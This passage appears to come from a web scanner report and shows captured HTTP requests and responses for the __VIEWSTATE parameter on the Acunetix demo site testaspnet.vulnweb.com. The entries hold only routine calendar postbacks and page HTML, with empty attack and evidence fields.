style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8498&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDASzLEN9sIZGRkqdOEAiI38Nir5y6lg%2BEPWBTcIMQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLm%2B4yiDgLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwf1Sam6ff8Ir5DK0ANhad%2BLWG6keg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:25:10 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDASzLEN9sIZGRkqdOEAiI38Nir5y6lg+EPWBTcIMQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLm+4yiDgLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwf1Sam6ff8Ir5DK0ANhad+LWG6keg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:White" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,135 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8486&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDAVjVWLtsIZGRklO%2Bd1%2FYnf9xHHG8IbPu7p%2FQCPt8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLSnumiDALTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcqiEE6zB9G%2FhtYuo9q1GbLyaV11g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:18 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgDAVjVWLtsIZGRklO+d1/Ynf9xHHG8IbPu7p/QCPt8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLSnumiDALTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcqiEE6zB9G/htYuo9q1GbLyaV11g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:White" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a 